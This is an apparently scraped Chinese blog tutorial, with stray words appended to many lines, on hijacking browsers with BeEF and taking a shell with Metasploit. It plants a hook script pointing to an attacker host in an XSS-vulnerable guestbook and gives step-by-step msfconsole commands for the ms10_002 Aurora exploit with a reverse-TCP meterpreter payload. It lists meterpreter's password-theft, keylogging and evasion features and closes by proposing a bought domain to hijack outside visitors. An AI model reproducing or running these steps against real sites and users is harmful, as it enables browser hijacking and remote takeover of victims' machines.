使用Beef劫持客戶端瀏覽器並進一步使用Beef+msf拿客戶端shell

環境:web

1.Kali(使用beef生成惡意代碼,IP:192.168.114.140)shell

2.一臺web服務器(留言板存在XSS跨站腳本漏洞,IP:192.168.114.204)windows

3. 客戶端(用於訪問web服務器,IP:192.168.114.130)瀏覽器

步驟:服務器

1. Kali使用beef生成惡意代碼網絡

2. 將惡意代碼寫入192.168.114.204網站留言板session

3. 只要客戶端訪問這個服務器的留言板,客戶端瀏覽器就會被劫持框架

目的:tcp

控制目標主機的瀏覽器,經過目標主機瀏覽器得到該主機的詳細信息,並進一步掃描內網,配合metasploit進行內網滲透工具

如下爲具體操做:

1、搭建服務器

首先我在window server 2003上搭建IIS服務器,在站長之家找了一個存在XSS漏洞的留言板源碼(我心依然留言板),發佈到IIS服務器上。


用WVS掃了一下,確實存在XSS漏洞:


2、Kali中Beef的安裝和使用:


啓動成功後:


瀏覽器輸入:http://127.0.0.1:3000/ui/panel,Usename與Password均爲beef:


3、掛馬


將如上圖所示的Hook URL寫入web服務器存在XSS漏洞的留言板中<scriptsrc="http://192.168.114.140:3000/hook.js"></script>


若是留言被管理員審覈經過,你的留言能在留言板顯示出來。當客戶端訪問服務器的留言板後,你能夠在Beef控制端查看目標主機,若是出現下圖所示內網,表示客戶端瀏覽器已經被成功劫持


在Current Browser項選擇Browser,點擊Hooked Domain選擇Redirect Browser,在右邊的Redirect URL中輸入網址,便可控制瀏覽器跳轉到目標網址


 

Beef+msf拿客戶端shell(XP+IE6)

 

1、運行metasploit

Kali收藏欄找到metasploit framework


也能夠新建終端輸入:msfconsole,啓動成功後:


輸入如下命令:

1.search ms10_002(尋找ms10_002漏洞)

2.useexploit/windows/browser/ms10_002_aurora(使用ms10_002極光漏洞)

3.set payloadwindows/meterpreter/reverse_tcp(設置TCP回連攻擊載荷)


4.show options(查看漏洞利用工具選項)


5.set srvhost 192.168.114.140(配置客戶端訪問的目標地址,這裏是Kali本機的IP地址)

6.set srvport 7777(訪問的端口號)

7.set uripath /(網站根路徑)

8.set lhost 192.168.114.140(設置本地接收地址)

9.set lport 4444(端口號)


10.show options (查看是否更改過來)


11.exploit(執行利用,出現以下所示表示執行成功)


利用Beef生成的惡意代碼植入到存在XSS漏洞的web服務器(12.168.114.204),客戶端(192.168.114.130)瀏覽植入惡意代碼的網頁,形成客戶端瀏覽器被劫持。當前客戶端使用的環境爲windows XP+IE6,咱們使用metasploit framework工具針對IE6的ms10_002極光漏洞進行利用,控制客戶端被劫持的瀏覽器訪問192.168.114.140:7777,觸發該漏洞,經過漏洞拿到客戶端的權限shell,回連192.168.114.140:4444,從而達到控制客戶端系統的目的。


因爲筆者的XP+IE6環境沒有搭好,如下用的firefox瀏覽器演示命令執行,跳轉以後的效果:


如何查看這個shell,咱們在Kali中的metasploit終端按下回車。輸入sessions –i(因爲用的firefox瀏覽器,因此沒有成功獲取session)


我在網上找了張圖,當成功利用,顯示以下:


根據sessions的Id,輸入sessions -i 1,獲得meterpreter:

meterpreter是metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個meterpretershell的連接。meterpretershell做爲滲透模塊有不少有用的功能,好比添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。另外meterpreter可以躲避入侵檢測系統。在遠程主機上隱藏本身,它不改變系統硬盤中的文件,所以HIDS[基於主機的入侵檢測系統]很難對它作出響應。此外它在運行的時候系統時間是變化的,因此跟蹤它或者終止它對於一個有經驗的人也會變得很是困難。


輸入shell就能夠拿到目標主機的一個cmd


而後就能夠作任何想作的事好比net user 建立用戶等

2、漏洞發佈網站:

想要使用metasploit,固然要配合漏洞進行利用,如下爲漏洞發佈網站,能夠常常去看看:

https://www.exploit-db.com/

3、Beef如何在外網中應用思路

僅我的的一些想法,若是不對請指正:利用本機爲Web服務器,購買域名,並將域名解析至本機IP地址,在本機的網站上寫入惡意代碼。當外網客戶端經過域名訪問我本機搭建的網站,致使瀏覽器被劫持。

相關文章
相關標籤/搜索